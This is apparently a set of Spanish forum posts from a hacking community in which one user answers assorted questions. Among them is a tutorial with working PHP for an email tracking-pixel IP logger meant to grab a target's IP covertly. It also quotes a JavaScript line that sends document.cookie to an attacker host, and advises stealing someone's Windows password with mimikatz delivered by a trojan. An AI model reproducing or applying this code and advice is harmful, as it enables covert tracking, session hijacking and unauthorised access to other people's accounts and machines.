You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
a lo que me refiero es cuando no recuerdas o ya no tienes esos medios de recuperacion, cambiaste de numero telefonico o no tieneas acceso a la cuenta de correo alternativa, etc.

Siempre puedes mirar a ver si ha habido un leak de la cuenta y buscar por google, si no, no hay manera mágica de obtener una contraseña

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
¿Que te interpreta el html y se cepilla todo el javascript? ¿Por ejemplo un iframe tragaria? Me sigue pareciendo un fallo gordo.
Me refiero a mi el correo por defecto me suprime todo lo que haga referencia externa, que entiendo es lo correcto. Pero creía recordar que correos como gmail y hotmail hacen lo mismo.

Obviamente el javascript en gmail y hotmail está filtrado. ¿Qué gestor de correos usas?
Puede  que dependiendo de como este configurado el email envíe este tipo de contenido a spam, pero aún así no elimina el contenido. (gmail con su configuración por defecto no envía a spam y hotmail depende del remitente, en ambos casos he conseguido que no se envíe a spam)

Saludos

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
¿Pero lo que estas metiendo no es el tag imagen con el source redireccionado hacia un servidor y te lo está interpretando?

Así es, pero no veo como se va a hacer así un robo de cookies.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Pero, a mi entender la mayoría de programas de correo así como visores mail no deberían dejan ver las imágenes que no vienen adjuntas. ¿En que correos lo habéis probado y funciona de modo satisfactorio?
Me refiero, si esto funcionase, por regla general, en lugar de coger la IP me sale mas a cuenta embeber un javascript y que me envíe las cookies como variable get con un document.cookie y así puedo entrar en el correo directamente en el correo en lugar de tener su IP. Vaya que me parece información mas relevante.

algo así como:

<img id="lalala" src=""></img>
<script> document.getElementByID('lalala').src='http://mideireccionIP/lala.php?var='+document.cookie </script>

El código está sin comprobar pero creo que se ve la idea.

La verdad no veo por donde vas, para que se ejecutase el script el servicio de correo tendría que ser vulnerable a XSS, en el caso que yo he expuesto no hace falta.

He enviado el email desde un gmail hasta un gmail, se ha cargado la foto normal y no lo ha enviado a spam, asi que no, se pueden enviar fotos no adjuntas con etiquetas HTML, de hecho los emails se envían en HTML, lo unico que he hecho ha sido imitar una CSRF haciendo que su navegador llame a mi PHP y me mande los datos

Saludos.

La fuerza bruta como te han dicho podrías usar ophcrack.
El keylogger no te servirá ya que se iniciaría una vez que se hubiera iniciado Windows, debería de ser un keylogger de hardware de los que se conectan entre el PC y el keyboard.

Por último podrías usar mimikatz, si no puedes instalarlo por que no tienes acceso directo a su PC podrías instalar un troyano y desde ahí ejecutarlo

Saludos.

Pues no hay otra forma que preguntar a quien lo haya modificado, en algunas ocasiones puede que ni nos acordemos si es un cambio muy minúsculo como arreglar una falta de ortografía o algo por el estilo.

Saludos.

Como en muchos casos la gente pregunta como conseguir la IP de un correo creo que es el momento de enseñar una técnica que podrán usar, efectiva y que no es sospechosa.

Lo que vamos a hacer es un IpLogger en PHP, solo que en esta ocasión en lugar de esperar que hagan click, haremos que devuelva una imagen, de esta forma la podremos cargar en el correo y obtener la IP sin necesidad de que el usuario haga click en ningún link. Este sería el código que vamos a usar:

<?php

// IpLogger

$datos = "Fecha: " . date('Y-m-d H:i:s') . " - IP: $_SERVER[REMOTE_ADDR] - UserAgent: $_SERVER[HTTP_USER_AGENT] ";
$archivo = fopen("datos.txt", "a");
$fw = fwrite($archivo, "$datos\n");
fclose($archivo);

// Devuelve imagen

$imagen = file_get_contents('https://url.es/imagen.jpg');  // Aquí pondrán la imagen que quieran que aparezca.

header('Content-type: image/jpeg;');
header("Content-Length: " . strlen($imagen));
echo $imagen;

?>

Para hacer que nos envíe la IP tan solo habría que usar la etiqueta <img src="www.dominio.es/codigo.php"> en el correo. En caso de usar Gmail la imagen también se puede cargar desde url.

(En cualquier WEB que pongan la etiqueta y entre alguien también mandará su IP).

Esto funciona como un CSRF, pueden leer You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login un tutorial.

Cuando el navegador lee la etiqueta <img src=""> este manda una petición GET para analizar cual es la imagen que devuelve esa url, al ser un código PHP este se ejecuta y después devuelve la imagen que es la que se va a mostrar en nuestro navegador.



Veamos como quedaría el mail recibido.



Y así quedarían los logs dentro de nuestro dominio.



En mi caso también me devuelve IPs de Google ya que envié el correo por Gmail y usé la opción de obtener imagen por URL.

Espero que les sea de utilidad.

También me pueden seguir en Twitter si les hace ilusión: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos.

Por lo que he visto la red que se crea es de tipo malla.



Una característica de este tipo es que si una de las conexiones cae la red sigue en pie, ya que hay varias formas de llegar a un destino.

Por lo tanto suponte que la conexión entre 1 y 6 no es posible, entonces el mensaje pasaría por 2, 3, 4 y todos los nodos que hicieran falta.

Saludos.

No he entendido bien esto último.
Es posible verificar si ha llegado de hotmail o de gmail, pero no de que IP se envía ese correo en caso de que se haya enviado en uno de estos dos.
Para obtener la IP siempre podrías hacerlo con un IP logger.

Saludos.

Pues depende del tipo de cheat, por lo que tengo entendido los típicos que se usan en los shoter que apuntan y disparan por ti lo hacen a través de hooks.

No te puedo decir más porque es un mundo que desconozco

Saludos.

Otra pregunta que es el primer resultado que hay en Google.
Antes de hacer una pregunta podrías mirar un poco a ver si hay algo ya escrito sobre el tema.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos.

Si escribes el error en Google mira que es lo primero que sale.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos.

Si se podría con Wine, y no tendrías ningún problema con la gráfica.
La pregunta es: ¿Por qué alguien querría instalar esteam en kali Linux?

Saludos.

Como has actualizado la herramienta?
Descargando de GitHub y sustituyendo?

Saludos.

La IP de las cabeceras del mail corresponde a la del servidor desde donde se envía es mail como bien dices, si no puedes comprobarlo haciendo un WHOIS a la IP. Si abrieras un server SMTP y enviaras un correo la IP si sería la tuya.

En segunda estancia lo de que la IP es única no se como entenderlo, tenemos dos IPs, una privada y una pública, las cuales consisten en cuatro cuartetos de números de 8 bits (0-255). Tu IP privada la puede tener otra máquina que esté conectada a un router diferente, tu IP pública la tienen todas las máquinas que esten conectadas a tu router.

Saludos.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Me quedo con el candado naranja.




Pero ANTRAX eso es una navegación vulnerable o vulnerada dentro de tu foro y lo sabes, cuando metes sólo el http pos que lea el que quiera, pero si el httpS tiene fallos, ahórrate la pasta en mantenerlo, y el tiempo.


No trato de incordiar, sabes mejor que yo que una lectura de tramas y paquetes es un clonado seguro.

Un saludo.

En realidad el hecho de que las fotos esten subidas a hosts sin SSL no produce ningún problema de seguridad

Saludos.

Que tal las librerías típicas de sockets, WINApis, etc, etc

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Buenas tardes comunidad de Underc0de, la verdad que he estudiado 1 año de ingeniería y soy muy malo para las matemáticas y física, deje la carrera ahora estudio otra, que no tiene nada que ver con la informatica, pero mi sueño siempre fue ser programador o desarrollador de videojuegos. Estoy haciendo un curso de programacion web HTML5, PHP, y algunos mas. Pero en que lenguaje me recomendarían que empieze? Quizas Java? C++? desde ya muchas gracias por sus opiniones!

Depende de que tipo de aplicaciones quieras desarrollar, en que te gustaría centrar tu carrera?

Prueba con Crunch
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Prueba con esto y dinos que te devuelve

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login